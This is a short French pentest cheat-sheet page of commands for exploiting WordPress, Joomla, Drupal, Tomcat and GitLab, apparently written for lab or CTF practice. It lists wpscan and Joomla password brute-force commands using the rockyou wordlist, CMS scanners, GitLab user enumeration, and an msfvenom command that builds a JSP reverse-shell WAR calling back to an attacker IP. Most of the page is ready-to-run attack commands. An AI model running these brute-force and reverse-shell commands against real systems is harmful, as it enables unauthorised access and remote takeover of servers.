Exploitation d'application

WordPress

sudo wpscan --url http://<machine_ip> --e --api-token 'jjj' 
sudo wpscan --password-attack xmlrpc -t 20 -U user -P /usr/share/wordlists/rockyou.txt --url http://<machine_ip>

Liste plugins : https://github.com/Perfectdotexe/WordPress-Plugins-List/blob/master/plugins.txt

Joomla

plugins/system/cache/cache.xml
administrator/index.php

droopescan scan joomla --url http://<machine_ip>/
python joomlascan.py -u http://<machine_ip>
python joomla-brute.py -u http://<machine_ip> -w rockyou.txt -usr admin

Drupal

CHANGELOG.txt
README.txt

droopescan scan drupal -u http://drupal.inlanefreight.local

Tomcat

/docs
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f war > backup.war

GitLab

/help
./gitlab_userenum.sh --url http://gitlab.machine.com:8081/ --userlist users.txt

PrécédentEvasion AV SuivantPorts

Mis à jour il y a 1 an

hashtagWordPress

hashtagJoomla

hashtagDrupal

hashtagTomcat

hashtagGitLab

WordPress

Joomla

Drupal

Tomcat

GitLab